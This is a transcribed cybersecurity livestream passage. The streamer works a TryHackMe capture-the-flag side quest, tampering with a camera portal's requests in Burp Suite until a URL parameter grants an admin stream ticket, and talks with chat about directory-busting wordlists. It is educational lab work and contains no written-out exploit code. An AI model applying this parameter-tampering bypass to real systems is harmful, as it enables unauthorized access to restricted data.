that do the type of fuzzing that you're trying to do, and then emulate it. Most of the time, you're gonna learn by successfully doing a task a few different times. There might be some slight complications thrown in each time, but you definitely want to learn the syntax and then try it out on a few different applications. So it's a length 5888. So exclude length 5888. Okay, and we'll just leave this running for a while to see if we can find something. That'd be nice. So, I mean, Jody Breeze, if you got like a specific thing that you're trying to fuzz, I might be able to give you an example or two. Okay, Jody says, I am mainly focused on web apps. I'm new to cybersecurity in general. Any good word lists that you know of? I mean, the word lists that I use are the word lists that everybody else uses. Could you give me an example of what you're trying to fuzz, and then maybe I can give you an example of a word list we would use? So running through. So streams v1, streams request. This is a post request. You send the options first. And do they give you like a CSRF token? So bear sub, guard Hopkins, roll guard. I mean, we can't change this, can we? Send to repeater. Oh, that was the response. So where do we start actually using this token in our requests? Here? Psych check, CGI bin, psych check .sh, code equals nothing, and then code equals 22. Let's send this to the repeater. Can we send something numerical? Okay, false. Okay, false. How about code 2? And then code 3, etc., etc. Script output follows. Simple HTTP server with Python 3. All right, I'm going to take a little water break because I've been talking for a while now. But in the meantime, let's put on some birds. I love my birds. And how about these birds? All right, we'll be back in about 60 seconds. Just need to have a little bit of water. Okay, so Jody Breeze says, should I see what technology they're using and then choose which word lists to use based off of that? I mean, could you give me an example of what kind of fuzzing you're trying to do? It would really help me understand exactly what you're asking. Okay, put the birds away, get back to the hacking. We are taking a look at Psych check. Psychcheck.sh. Code equals... Oh, okay, we've done this. Yeah, okay. I think I understand. Get our authorization. This is in our request for stream requests. Cam loading, tier guard. this is our bearer token, our OAuth stuff. Go here and then start messing around with the bearer token. So sub, let's do admin at HopSec Asylum, and we'll do our role admin. Send this off. We get unauthorized. Okay, so this is not a correct token, so they give us unauthorized. It's probably because we've got, well, we don't have the correct value over here. This stuff. So this is being used for the other cookies. So Jody says, I'm trying to find directories that I can't find. Crawling and manually going through web applications like hidden directories that aren't mentioned anywhere. So you're doing directory busting, okay? So I mean, directory busting. Most people use the same lists for directory busting. It's usually going to be like directory list 2.3 medium, which is like this path over here. Although I've heard some people say that they've had better success with other stuff. Generally, you want to take a look at seclists. I don't know if you have like seclists. I think it comes installed by default on Kali Linux. I don't know if you're using Kali Linux. I'm just going to assume that you are. And you could look in like seclists, like discovery. No. So let's see. Seclist, web shells. Well, Seclist passwords. Passwords, miscellaneous fuzzing. So is it like fuzzing discovery? I guess you could do a lot worse than taking a look at the stuff at Seclist, right? Let's take a quick look. So we got polyglots, SQLI, user agents XSS, LFI, databases amounts, 403, and I'm not entirely sure whether or not they consider like directory busting to be fuzzing in this case. Maybe not. Okay, so seclist discovery. So I think you might want to look, if you're doing directory busting, you probably want to take a look at discovery. DNS, file system, infrastructure, mainframe, web content. So we'll do web content. And I'm pretty sure they've got directory list 2.3 in here as well. Yeah, so 2.3 medium. You could try a few different word lists in here. If you're looking at like a specific application, you might want to use like a specialized word list. So for example, if you've got Oracle App Server or something like that, or something that's very, very specific, you could try looking for specific directory lists for those. The other thing you could do is you could start looking for like the directory structure. So for example, if you've got, let's just pretend that you're looking at WordPress. So WordPress is very well documented. Is it here? Okay, so you could, for example, if you were able to find like a GitHub page, you can basically browse the entire file structure, and then you don't have to really guess at the directories, because the GitHub repositories are going to show you the entire file structure of the application. But if it's just, trying to get in from the outside and you're not exactly sure which application is being used, try some of the word lists from sec lists and Discovery Web content. So I'd, probably not going to be able to get past this. Jody says, see what you're getting to. I need to do more research on my targets and what they're using. I mean, are you doing exercises from like well-known platforms like TryHackMe and Hack the Box? Or are you doing like bug bounty? I'm not too sure like which exercises you're doing, or if you're doing like, you know, or if you're doing bug bounty, which is like an entirely different thing. So we could just try brute forcing this. So Psych War gets exit key code. Key code. This gives invalid code. This thing we just unlock, select unlock. Okay, since I'm really stuck, I might take a look at a little bit of a write-up just to get ourselves unstuck. Write-up title, side quest 1 write-up, Great Disappearing Act write-up, YouTube tutorial walkthrough. So we're just gonna take a look at what the next step is to get ourselves unstuck. So we're stuck at part 1. Okay, so we did this. We did all this. We did our brute force attack. Okay, so the first flag is at the storage over here. So with Hopkins Guard's credentials, we were able to access the facility video portal. We've done this. So all the video recordings appear to be compromised, okay. Access to the admin cam is restricted, okay. We can intercept a request of clicking the cam lobby using Burp Suite. We've been taking a look at this, yeah. So after we forward the request, another request follows to V1 Stream's request, which requests a stream using a post request. The camera ID and the tier are defined in the post body. We've seen this, okay? After we forward this request, another request follows, namely for this file. So MPU8 file. It's a playlist used by the HTTP live streaming, HLS, that tells a media player where to find and play the video and audio segments over the internet. It's a text file encoded in UTF-8, commonly used by streaming platforms to deliver adaptive bitrate streams. Okay, so we repeat the whole process, but this time we forward the request to V1 Stream's request in the repeater. However, we see our effective tier as well as the ticket ID as the response. So I mean, we've taken a look at these requests before. Okay, Jody Bree says I'm doing bug bounties. Unfortunately, I can't really help too much as far as bug bounties are concerned. We actually have somebody who is also doing bug bounties in the Twitch stream, Shin BDR. So Shin, if you're still here, maybe you can talk about what your approach is for directory busting on your bug bounty targets. Okay, so cam ID, and then they give you an effective ID. So yeah, Jody Breeze, you can come over to... Actually, you might be able to contact each other on Discord. So come and join the Discord server. Okay, this goes out to the request. So we take a look at the JavaScript of the portal, the core logic, mainly main.js. We also see a camera ID CamAdmin. CamAdmin, cam ID equals CamAdmin. Constant is admin cam equals cam ID. So when we request this CamAdmin, we receive a ticket which we can use to play the stream. We can find that the compromised video is still being played. Furthermore, we are still in the effective tier guard. So camera ID equals CamAdmin. Oh, is this like... Hold on. The problem is I was never able to get this going with the Burp Suite browser. Hold on, let's go back. So the post request? No, the get request. So we got our options, stream request here, okay. And then we put it into repeater. So cam ID we're going to put in as admin. Okay, and then what are they explaining here? CamAdmin, tier guard. So if we change the tier in the post body, the effective tier stays the same, and the ticket ID results in the compromised video. So CamAdmin and admin? Wait. Tier admin. Can we send this in the browser? Request in browser in current browser session, and we'll try doing this in the Burp Suite browser. Okay, so I mean this doesn't really get us. This doesn't get us anything. Okay, to play the video we have the ticket ID. So the ticket ID. Thank you very much for subscribing on YouTube. OAUTH. Thank you. So the site provides us with a function called attach with reconnect, which we can use to play the video by passing the ticket ID. In the source, we also see the effective use of tiers guard and admin. We were probably not wrong about the tier labeling. So do we run this inside of the console? So we execute this in the console with the ticket ID resulting from the manipulated request. We see the compromised video. So we're in the so we run this in the JavaScript console. Let's try doing it from this over here. Okay, so this is the guard console. Thank you very much for subscribing on, or for following on Twitch. Persistent Panda, thank you. Okay, let's go back. We're here. We want to run this thing in the console. Where is it? Web Developer Tools console. Where's that run button? Here? Okay, not found. we need to replace this with our own stuff. So manifest something something, but we need to get our correct ticket. Where's our ticket? Send. We get a ticket ID here. Copy it. And ACUT, thank you very much for becoming a member on YouTube. Thank you very much. Much appreciated. HackerFrog Silver, thank you. Let's give you a fun video redeem. How about some Jurassic Park?
It's a Unix system. I know this. It's all the files of the whole park. It tells you everything.
Segfaults, hey, hello, nice to see you here. I didn't see your message before, but Heyo just finished doing 2 easy Hack the Box boxes today. Dog and Broker. Awesome, Segfaults, yeah, that's great. Okay, I'm just trying to figure out this challenge over here, the side quest one. So, it looks like we got to do some JavaScript shenanigans. Let's put in our ticket. Okay, run. We get a not found. Let me try running this from the other browser. So other browser is over here. Our developer tools are over here. We got our console. And paste in the stuff. Click on run. Undefined. So we weren't able to get it to... Yeah, we weren't able to get any of the videos to run over here. We execute the console, this in the console with the ticket ID resulting from the manipulated request. We see the compromised video. We're trying to get something new. We were trying to get something new and not only setting the tier in the post data, but also in the get request. This time we receive a response confirming that we are indeed in the admin tier. Then we copy the ticket ID and request the stream again in the console. We can see how a code is entered on the number pad. We write down the code. Okay, let's go back to Burp Suite proxy. So we sent this thing, cam admin, tier admin. We got a response. The effective tier still says guard, unfortunately. Cool Guy says, love your live streams, keep it up. Thank you very much. Jody Bree says, joining Discord now. Fire forgot Discord credentials. No worries, no worries. So we get... Interesting. So this is the video stuff. This is the response. In a request... Okay, let's get this in the... I mean, we're still... I don't know if we managed to spoof our admin credentials or the admin level. Request in browser in current session. Okay, so this downloaded? This downloaded a file. So it's here. Can we play it? No. What is the name of that file? Let's take a look. So the file's called... Oh, did it not get saved? Manifest something something. So in the downloads directory, we should have something called manifest. Here it is. Shinbier says, jump to YouTube. Awesome, awesome. Okay, so let's take a look at what this file is. So it's a M3U playlist ASCII text. So how do we view this? XDG open. Yeah, so it's supposed to, open up in a video file, but we can't access this this thing. We can see how a code is entered on the number pad. We write down the code. Oh, interesting. So this was supposed to be... We go down to the portal on port 8080 and try out the second door. So the second door, this was supposed to download like a video that we could watch. How does this work? So in the response, we're supposed to have effective ID of admin. Cam admin. Thank you very much for following on Twitch, McIbra. Thank you. Thank you very much. Okay, so in here, console ticket ID resulting from a manipulated request, we see the compromised video. So here we switch our request to cam admin and then tier admin. Then we get the ticket ID. So let's try doing that. And much appreciated, McIver. Thank you. Thank you. Let's go back. So this stuff... Effective tier guard post request. So cam admin, tier admin, put this in the repeater, send it off. Champidier says, I was doing a THM lab and my bug bounty mined instead of looking for vulnerabilities, I was looking for bugs and realized minutes later. Yeah, I mean, there's a meta for each one of these exercises that you're doing. Keep the meta in mind. Okay, so effective guard, tier guard, copy this, then go back to here. Okay, let's start messing around with the text editor. So here's our ticket, and bit008, hello, nice to see you here. What is up? What is up? Okay, we got our ticket ID, which looks kind of similar. The site provides us with a function called attach with reconnect, which can be used to play the video by passing the ticket ID. In the source, we see the effective use of tiers, guard, and admin. Okay, so we got, I mean, this whole thing. Is this SQ1? Yeah, this is side quest 1. I'm figuring out how to do it. There's a lot of stuff I haven't really done before in here. So get the JTicket ID plus manifest something something. So this is it. So I guess we need to put this between some of these. Okay, we'll give this a try. Bit008 says, I solved this. If you get stuck and give some direction. Haxer Lemur? Hello, nice to see you here. What is up? When did you begin hacking? I mean, it's been a while now. I think I've been at this for about 5 years or so. It's almost been 5 years. But yeah, I started hacking during the lockdown, and I've never stopped. Okay, let's go back here. Yeah, but Bit008, I'm learning a lot of stuff over here. It's been very, what is the word? Educational. Okay, paste this thing in, run the thing, and then it says undefined. Not found, undefined. We probably want to run this through Burp Suite. Haxer Lemur says, is hacking a good job? Is hacking a good job? I mean, your name is Haxer Lemur. Your name is Haxer Lemur. Shouldn't you know? But if not, I mean, is it a good job? If you like it, it's a good job. If you don't like it, it's not a good job. I'd say that I saw the video through VLC. Can you wait? How do you run it through VLC? With a link to the stream. With the link to the stream. So I don't know if we've got VLC installed on here. VLC? No, it's not here. So where's that proxy? So the proxy might have it. Safe browsing. So you got the stream request over here, cam admin admin, right? And that gives you another ticket. So maybe we should, but it still says effective tier guard. Okay, Haxer Lemur says, I'm not a hacker, but I know the basics. Okay. Study Matter 1. Hello, nice to see you here. Where are you from? I'm from Canada, so I live on the west coast of Canada. It's a good time, and it is very cold and it's winter. You still haven't compromised to get the admin ticket. Yeah, I'm trying to figure it out right now. So we were able to get. So the post request still has me at effective tier guard. Unfortunately, I'm following a guide right now to figure out how to get ourselves our admin access. So effective tier guard. We sent cam admin. Okay, Bit says, alright, just think of other ways we would pass the tier as a parameter in the request without it being in the body. Without it being in the body, well, I mean, the only other place that I could think of is like in the authorization. So cam admin. When we send this request, it still gives us like a ticket ID. It gives us a ticket ID, but we're still the effective tier guard. Maybe in the path using question mark. the path. So the path is here. So you pass it as like a URL parameter? Okay, so Haxer Lemur says, I'm looking for advice. I'm 11. You shouldn't be on this website. Well, okay. You're not on Twitch. You're on YouTube. YouTube doesn't have an age restriction. Looking for advice and being a gray hat good? I can't really recommend people doing gray hat stuff because we don't condone criminal activity. Is red teaming hard, or is it blue teaming, or should I do both? Well, I mean, if you're as young as you say you are, then you could try everything for, well, I mean, you could try stuff for a few years, and it really wouldn't affect you too much. Bit says try the URL parameter. Okay, well, so post v1 streams request, and then tier equals admin. Is it as easy as that? Wow! Whoa! What, really? That is, wow, that is something, huh? That sure is something. Let's go back. Took me 2 days. Well, I mean, I spent like a day doing the side quest. I wasn't able to get very far. Okay, let's try this thing in the browser. Attach with reconnect is not defined. Okay, so I need to go back to the specific web page. Okay, paste it in. It says undefined. It says undefined, but if we go over to the proxy, this gives us, do you have API defined? Okay, so we're looking at attach with reconnect, API plus, oh, API has to be, API probably, that's going to be the IP address, right? Okay, should I use Parrot or Kali, or do you use Black Arch? I mean, if you want to have an easier time learning cybersecurity, probably go with Kali Linux because it's the one that everybody else uses. So is it supposed to look like this? Maybe? Okay, and Haxer Lemur says, I want to be anonymous and I want to be different. If you want to be anonymous and you want to be different, then maybe go with Black Arch. I've never really used it myself. Okay, so API is not defined. Let's go in, try this again. Missing something after the argument list. So missing parentheses. Where? Oh, I noticed something. Probably want to get rid of this extra slash. Okay, Jody Bree says, I used Parrot before, it was pretty good. Let's try it out. Neems, hello, nice to see you here. Missing something after argument list. So where's our argument list? So API, maybe we should put this entire thing between some quotes. That might help us out. Okay, well, it didn't give us an error message. I'm using the wrong thing. So it still says undefined over here. So when we ran attach with reconnect, it didn't. Wait, I need to make sure that this is the same thing. 446. Okay, this is what we're looking for. Let's try sending this in the browser. In current session. Okay. Is that the correct port? Should be. This is 13400, right? That's the port for the web app. Does the video server have another port? The video server? So the video server should be this one on 13400. Oh, wait. Maybe it should be 4001. Hold on, let me look back. Okay, we'll keep on going for another 20 minutes or so. Okay, so is this going to the right port? This is 4000, but is everything's supposed to be going to 4001? Okay, I think I might have had the wrong port all this time. So 4001. Let's adjust that. And I just want to check and see if my machine is not gonna expire in the next 2 or 3 minutes. Okay, we're still good. Let's go over here. Request in browser. Current session. Okay, so this downloads the manifest file. 4001 is the correct one. You said that you were able to do it through, I don't know about the console thing, I used VLC. So I mean, let me see if I can download VLC on my own. Okay, so it looks like I can install VLC. Okay, so VLC, then put in, yeah, the ticket, and then the manifest something something. Oh, yeah, okay, okay. All right, so VLC, and then the information. So we got the information over where? Here. Copy all this stuff. Okay, and we need to plug in our IP address and the port number. Where's our IP address? Here we go. Okay, and is VLC not working for me? So streams, ticket, manifest, something something. I guess VLC isn't working for me. Sudo apt install VLC. This is different. Okay, I guess we need to install this thing instead. Oh. Okay, before I install anything, I need to turn off my my antivirus, because my antivirus doesn't like Kali. Storyteller says Bit008 is a knowledgeable person. I agree. So we'll turn protection off on the antivirus just for a second. And then we will sudo apt update, sudo apt update, and then sudo apt install VLC. Okay, so we should be able to actually install the thing now that we've turned off the antivirus. Okay, install, yeah. Then after it's done, we can turn the antivirus back on. Well, I mean, most of what hacking is looking up how to find information. Okay, so we just run VLC, we get this. Okay, good, good. So we just need to get that stream. Input can't be opened. Check the log for details. Didn't work. Okay, let's go back. So use CVLC to use VLC without interface. Playlist is empty. So we weren't able to open up the stream. Vexility TV says nobody's a walking wiki memorizing everything. Yeah, not anymore. Not anymore, at least. Okay, let's get the ticket again. Maybe it just, yeah, maybe it what is the word? It expired already. So where's the repeater? So tier admin request the thing. Send. We get another ticket ID. Let's copy this. And we'll just plug it in over here. Okay, so it's 1 1 1 1 5 8 what? Okay, I need to type this, to write this down. Can we scrub back? One one 5 8 7 9. Which OS are we using? We're using Kali Linux. So let me 8 7 9 1 5 8 7 9. Okay, so let's plug it in. Jeez, this was such an ordeal. Anyways, let's go over to the Psych ward exit. So 1 5 5 1 1 5 8 7 9. Invalid code. The best is yet to come. Is it very, very different? So 1 1 5 8 7 9. It's 1 1 1? Was it a triple one? We still get invalid code. We should watch it again. One one 5 8 7 9. Is it 1 1 1 5 8 7 9? Some other people say it's 1 1 1 5. Let's play it one more time. One one 5 8 7 9. Okay, so we're here. Psych ward exit. 1 1 5 8 7 9. Okay, code accepted. This is the only first part of the flag. You need to find the complete flag somewhere else. Okay, well, completed this part. Looks like the 7 wasn't pressed. Well, I mean, we put it in. You need to take a look at the flashing lights as well as the sounds. Okay, anyways, I'm gonna record this somewhere. Okay, so after this is done, I don't even know what we're supposed to be looking at next. Anyways, let's go back here. This has been a very educational experience. Pretty cool process to get this flag. Yeah, for sure. Okay, so what's the next step? So after we do... Okay, so it's actually keeping track of where we've been already. So unlock Hopper's cell, move through the lobby, bypass the psych ward keypad. So we've done this. Once the keypad is bypassed, you need to gain access to the psych ward exit hallway. Reach the main corridor. From the psych ward exit, you can move south and loop around into the main corridor. This is the final section of the escape route. The last challenge awaits here, and completing it will open the final exit door. Okay, so Nandini, hello, nice to see you here. Is this TryHackMe? Yeah, this is TryHackMe. We're doing this room specifically. Hoodie Crusader says, odd that the code didn't work the first 4 times and I couldn't hear the video effects. Yeah, I guess you wouldn't be able to hear it. Sorry about that. Okay, so let's go back. So now that all of this has been done, yeah, access restricted. If we go back to port 8080, we've already unlocked these 2. I mean, the camera feeds don't really work. Okay, if you're stuck, I'll give you direction. Just trying to poke around a bit first. So this is the final part. It's SCADA unlock password. So if this is SCADA is a really big. Is this free or is it paid? This is free. So if you want to check out what we've done so far, you can check it out over here at the GitHub. So what you probably want to do is you want to access the first side quest stuff over here. Okay, so Bit says don't worry about that. Try to find the second part of the flag. So the second part of the flag is probably... It's probably going to be in the response. So let's go port 8080. Sometimes videos and streams have metadata. Oh, you don't say. So we actually downloaded this manifest file. Okay, so I got MIME encoding US ASCII, great. Metadata in here, huh? I mean, everything in this file is text. Unless I'm looking for like a flag or something. Nope. So I got ext m3u ext version something something. Actually, let's pipe it into less. Is that the right ticket for the admin feed? Maybe not. I think we can download the thing too. Hold on. So where was the... So where do we run VLC? Here it's over here. Can we wget this? Not found. Okay, so I'm pretty sure we wouldn't be able to run this thing either. Yeah, so this doesn't exist anymore. So while we're running this, we could probably download it, right? Let's do that again. This part is annoying. Okay, so copy it, go back, replace this. Okay, and then can we download? Convert save. Playback. Maybe we can try saving it. You can select local files with the following buttons. How do we save from here? So media, open file, open network stream, right? Save playlist to file. Quit at end of playlist. Okay, let's look it up. So it's VLC save stream to file. You can save a stream to a file in VLC Media Player by using the convert save function for direct saving without viewing, or by using the record button feature while actively watching the stream. So using convert save, open network stream, paste in the stream URL. Instead of clicking play, click on the drop down. Okay, Bit says, I don't know if you can wget it. I looked it up in burp. So the oh, if you plug it into burp, it'll probably download it, right? Okay, let me grab that thing. So here, let's see. We'll get a new ticket. Then we will plug it in to here. And we might be able to just put this in the Burp Suite browser. Yeah, this downloads. Insecure download blocked. So we'll keep it. And this is manifest 2. We'll try copying it over. Doesn't exist. Okay. Nandini says, I have doubt hacking illegal websites. I mean, this is, what are you talking, are you talking about, wait, why are you talking about illegal websites? We're not doing anything illegal over here. Okay, so it's manifest something something. Ah, this one. Okay, so we've got this thing in here. So EXIF tool. EXIF tool, we were talking about it earlier, it's always relevant. Okay, TXT plain, US ASCII, strings it. pipe into less. So RSTP vendor test cam admin. Data ID, okay. Yeah. Alright, I think what we're dealing with is we're dealing with the stuff at the top. V1 ingest diagnostic. Oh, okay, okay. We might have to manually move to this endpoint here. New endpoints. Yeah, my favorite thing. So this is on port 13400. We need to log in first. Something tells me I'm not looking on the right port, on the right method is not allowed. Okay, Storyteller says hacking any website without permission is probably illegal or a crime. But I mean, we're doing hacking exercises over here. This is all educational stuff. But yeah, if you if this wasn't an educational environment, then this would not be super legal. So ingest diagnostics. So V1 ingest diagnostics. Hopsec.diagnostics. Let's see. Is it good to dox your bullies? I'm not gonna endorse doxing on my stream. It's I don't endorse any unethical activities over here, of course. So this is the thing. What is that endpoint called? Ingest diagnostics. So this gives us is it supposed to be okay. So this is not found. So this is 4001. So that's also 4000 402 not found. 403 not found. Don't you need the V1? Oh, you're right. I forgot the V1. So this is 4,400. This is 401. Method not allowed. So this method is not allowed for the requested URL. So this is a GET request. But what happens if we make it another type of request? So curl post. So error unauthorized. So let's see. So we sent this post request. I suppose we need to send some cookies. What are our cookies? You remember this. All right. Go back. Authorization bearer, maybe? All this stuff. Look at this. Look at the manifest. I think it has more info. I think I need to put all this between some single quotes. Okay, so this says error unauthorized. I think what we need to do is we need to send our cookie. So our cookie is, it's a different thing. Yeah, this one right here. Just need to get rid of all this stuff, and then okay, it still says unauthorized. Content length unauthorized. So if we don't send like a post request, it'll just say something like method not allowed. Yeah, this is method not allowed. So get post and options. So maybe we need to send in options. Did this come back okay? So this came back okay. This didn't come back unauthorized. So hopsec.diagnostics, v1 ingest diagnostics. So you said something, Bit, you said something about a manifest. So there's hopsec.jobs, there's also hopsec.diagnostics. So ingest jobs. I didn't, was there something about a manifest in there as well? Oh, the manifest. Hopsec, okay, so the other, ingest jobs. Ingest diagnostics, ingest jobs. So we'll go back and we'll look for ingest jobs. Not found. So ingest jobs was not found. The video file, it has an example of a body maybe. Let's take a look. So v1 streams. Hopsec diagnostics goes to the ingest diagnostics endpoint. And then there is a jobs endpoint over here as well. Okay, so data, session data ID equals something. I mean, this is all very interesting. I need to get going pretty soon because it's getting kind of late. But you know what we'll do? We'll take a look and see if there are any cool people streaming on InfoSec streams. So InfoSec streams is a great list of people who do live streaming and cybersecurity stuff. It looks like I'm the only person on the list who's streaming right now. Let me see if anybody else, any other awesome people are on twitch.tv right now. So there is Moohoodles. So Moohoodles, there is... Let's give the science stream. There's also the science stream on right now. So let's take a look at what they're doing. Okay, Bit08 says, I have the request here. I think it would be fun for you to find it on stream. Took me a couple hours though. Well, I mean, if it takes you a couple hours when you're concentrating on it and not looking after a stream, would take longer for me. Okay, so it looks like we're looking at some microscope stuff over here. Awesome, awesome. So I'm just going to start my raid, and then we'll talk about what we're going to be doing next stream. Okay? Thank you very much for the follow, G. Gulez. Thank you. Okay, let's raid. Okay, so before we go, let's talk about what we're going to be doing next stream. So today's Monday, and we just finished off our Monday stream. We're going to be doing Web App Wednesday. We're going to be doing some programming games first. The Farmer was replaced. It's a very fun programming game that's based on, well, it's basically Python, and we're going to be taking a look at that first. We're going to be taking a look at some more walkthrough videos for web apps. This one's going to be called Apache over in EchoCTF. We're going to be continuing our ICS attacking for the SCADA systems over at TryHackMe, attacking ICS Plant number 2. And then we're going to be taking a look at race conditions over at the Portswigger Labs. So we're going to be learning about a new class of vulnerability. It's going to be a lot of fun. And SVUp says you need to set that curl request with a header for authorization. I'll look into that. Thank you very much. And can send you a pastebin on Discord if you want. Yeah. Maybe give me a message on Discord after the stream is done. Thanks. Okay, everybody, we're going to be going out to science streams. When you get there, please give us a message that goes like this: OS Frog, hip hop hack, OS Frog. Okay, I would really appreciate it. All right, HackerFrogs out in 5, 4, 3, 2, 1.